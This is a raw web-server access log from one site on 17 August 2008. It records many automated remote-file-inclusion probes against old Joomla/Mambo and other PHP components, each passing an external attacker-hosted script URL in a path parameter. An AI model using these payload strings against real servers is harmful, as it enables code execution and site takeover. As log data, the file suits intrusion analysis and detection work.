64.185.237.191 - - [17/Aug/2008:17:26:12 -0700] "GET /logs/access_071112.log//skin/zero_vote/error.php?dir=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
66.199.250.122 - - [17/Aug/2008:17:26:12 -0700] "GET /logs/access_080406.log//?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.199.250.122 - - [17/Aug/2008:17:26:12 -0700] "GET //?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.199.250.122 - - [17/Aug/2008:17:26:13 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 5948 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.199.250.122 - - [17/Aug/2008:17:27:03 -0700] "GET /logs/access_080224.log//?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.199.250.122 - - [17/Aug/2008:17:28:28 -0700] "GET /logs/access_080406.log//?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.199.250.122 - - [17/Aug/2008:17:28:28 -0700] "GET //?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.199.250.122 - - [17/Aug/2008:17:28:28 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 5948 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.199.250.122 - - [17/Aug/2008:17:29:23 -0700] "GET /logs/access_080224.log//?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:17:32:42 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:17:32:42 -0700] "GET //modules/xt_conteudo/admin/spaw/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:17:33:01 -0700] "GET /logs/access_080406.log//?path%5Bdocroot%5D=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:17:33:01 -0700] "GET /logs/access_080406.log//?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:17:33:01 -0700] "GET //?path%5Bdocroot%5D=http://leqhi.com/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:17:33:01 -0700] "GET //?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:17:33:02 -0700] "GET /logs//?path%5Bdocroot%5D=http://leqhi.com/id.txt?? HTTP/1.1" 200 5948 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:17:33:02 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 5948 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.200.171.55 - - [17/Aug/2008:17:33:55 -0700] "GET /logs/access_071112.log//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.200.171.55 - - [17/Aug/2008:17:33:55 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.200.171.55 - - [17/Aug/2008:17:33:55 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.200.171.55 - - [17/Aug/2008:17:34:09 -0700] "GET /logs/access_071203.log//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:17:34:31 -0700] "GET /logs/access_080224.log//?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:17:34:32 -0700] "GET /logs/access_080224.log//?path%5Bdocroot%5D=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
207.97.207.149 - - [17/Aug/2008:17:34:49 -0700] "GET /logs/access_071217.log/index.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
218.188.33.2 - - [17/Aug/2008:17:35:50 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
146.155.63.15 - - [17/Aug/2008:17:36:19 -0700] "GET /login.php?dir=http://jackou06.free.fr/site/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
146.155.63.15 - - [17/Aug/2008:17:36:19 -0700] "GET /logs/access_071111.log/login.php?dir=http://jackou06.free.fr/site/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
146.155.63.15 - - [17/Aug/2008:17:36:19 -0700] "GET /logs/login.php?dir=http://jackou06.free.fr/site/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
146.155.63.15 - - [17/Aug/2008:17:36:19 -0700] "GET /logs/access_080204.log/login.php?dir=http://jackou06.free.fr/site/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
218.188.33.2 - - [17/Aug/2008:17:36:59 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
218.188.33.2 - - [17/Aug/2008:17:36:59 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
218.188.33.2 - - [17/Aug/2008:17:36:59 -0700] "GET /logs/access_071112.log//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
218.188.33.2 - - [17/Aug/2008:17:37:24 -0700] "GET /logs/access_071203.log//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:17:37:50 -0700] "GET /logs/access_080406.log//?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:17:37:50 -0700] "GET //?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:17:37:51 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 5948 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.87.154.41 - - [17/Aug/2008:17:38:37 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.87.154.41 - - [17/Aug/2008:17:38:37 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.87.154.41 - - [17/Aug/2008:17:38:38 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
62.87.154.41 - - [17/Aug/2008:17:38:38 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
72.9.144.10 - - [17/Aug/2008:17:38:42 -0700] "GET /logs/access_071112.log//components/com_forum/download.php?phpbb_root_path=http://www.zoltis.com/faq/attachments/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
72.9.144.10 - - [17/Aug/2008:17:38:42 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.zoltis.com/faq/attachments/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
72.9.144.10 - - [17/Aug/2008:17:38:42 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.zoltis.com/faq/attachments/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
72.9.144.10 - - [17/Aug/2008:17:39:13 -0700] "GET /logs/access_071203.log//components/com_forum/download.php?phpbb_root_path=http://www.zoltis.com/faq/attachments/errors.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
89.248.110.152 - - [17/Aug/2008:17:39:21 -0700] "GET /logs/access_080224.log//?path%5Bdocroot%5D=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:39:22 -0700] "GET /logs/access_071112.log//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:39:22 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:39:22 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:39:22 -0700] "GET /logs/access_071112.log//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:39:23 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:39:23 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:39:55 -0700] "GET /logs/access_071203.log//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:39:55 -0700] "GET /logs/access_071203.log//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:41:00 -0700] "GET /logs/access_071112.log//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:41:00 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:41:00 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:41:06 -0700] "GET /logs/access_071112.log//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:41:06 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:41:06 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.105.33.158 - - [17/Aug/2008:17:41:25 -0700] "GET /logs/access_080428.log/index.php?d1=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.197.234.53 - - [17/Aug/2008:17:41:29 -0700] "GET /logs/access_070910.log/includes/stats.inc.php?prefix=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:41:33 -0700] "GET /logs/access_071203.log//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.105.33.158 - - [17/Aug/2008:17:41:36 -0700] "GET /index.php?d1=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.45.251.34 - - [17/Aug/2008:17:41:40 -0700] "GET /logs/access_071203.log//components/com_forum/download.php?phpbb_root_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.105.33.158 - - [17/Aug/2008:17:41:45 -0700] "GET /logs/index.php?d1=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:17:42:12 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.185.237.191 - - [17/Aug/2008:17:42:12 -0700] "GET //skin/zero_vote/error.php?dir=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
205.234.253.176 - - [17/Aug/2008:17:42:30 -0700] "GET /logs/access_080210.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://m4ng4.100webspace.net/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
205.234.253.176 - - [17/Aug/2008:17:42:30 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://m4ng4.100webspace.net/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
205.234.253.176 - - [17/Aug/2008:17:42:30 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://m4ng4.100webspace.net/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
205.234.253.176 - - [17/Aug/2008:17:42:45 -0700] "GET /logs/access_071015.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://m4ng4.100webspace.net/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
212.73.82.13 - - [17/Aug/2008:17:45:09 -0700] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
212.73.82.13 - - [17/Aug/2008:17:45:13 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
212.73.82.13 - - [17/Aug/2008:17:45:21 -0700] "GET /logs/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
205.234.253.176 - - [17/Aug/2008:17:45:34 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://m4ng4.100webspace.net/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
212.73.82.13 - - [17/Aug/2008:17:46:02 -0700] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
212.73.82.13 - - [17/Aug/2008:17:46:06 -0700] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
212.73.82.13 - - [17/Aug/2008:17:46:06 -0700] "GET /logs/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
207.162.215.10 - - [17/Aug/2008:17:46:12 -0700] "GET /logs/access_070827.log//newspublish/include.php?path%5Bdocroot%5D=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
207.162.215.10 - - [17/Aug/2008:17:46:12 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
207.162.215.10 - - [17/Aug/2008:17:46:18 -0700] "GET /logs/access_071111.log//newspublish/include.php?path%5Bdocroot%5D=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.summitcircle.com"
77.232.68.17 - - [17/Aug/2008:17:47:06 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://64.251.8.142/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.232.68.17 - - [17/Aug/2008:17:47:06 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://64.251.8.142/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.186.1.54 - - [17/Aug/2008:17:48:01 -0700] "GET /logs/access_080210.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
89.186.1.54 - - [17/Aug/2008:17:48:01 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
89.186.1.54 - - [17/Aug/2008:17:48:01 -0700] "GET /logs/access_071015.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
89.186.1.54 - - [17/Aug/2008:17:48:01 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:48:42 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:48:42 -0700] "GET /logs/access_080616.log%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
218.188.33.2 - - [17/Aug/2008:17:48:42 -0700] "GET /logs/access_071112.log//components/com_forum/download.php?phpbb_root_path=http://www.bk-muenchen.de/cms/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:48:42 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
218.188.33.2 - - [17/Aug/2008:17:48:43 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.bk-muenchen.de/cms/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
218.188.33.2 - - [17/Aug/2008:17:48:43 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.bk-muenchen.de/cms/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:17:49:03 -0700] "GET /logs/access_080428.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:17:49:03 -0700] "GET /logs/access_080428.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:17:49:03 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:17:49:03 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
66.249.71.235 - - [17/Aug/2008:17:49:20 -0700] "GET /latest/news/VoIP_911_to_be_regulated.html HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:49:57 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:49:57 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.92.85.234 - - [17/Aug/2008:17:49:57 -0700] "GET /logs/access_080414.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:17:50:00 -0700] "GET /logs/access_080224.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
208.98.1.215 - - [17/Aug/2008:17:50:00 -0700] "GET /logs/access_080224.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
212.73.82.13 - - [17/Aug/2008:17:50:24 -0700] "GET /logs/access_071231.log/sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
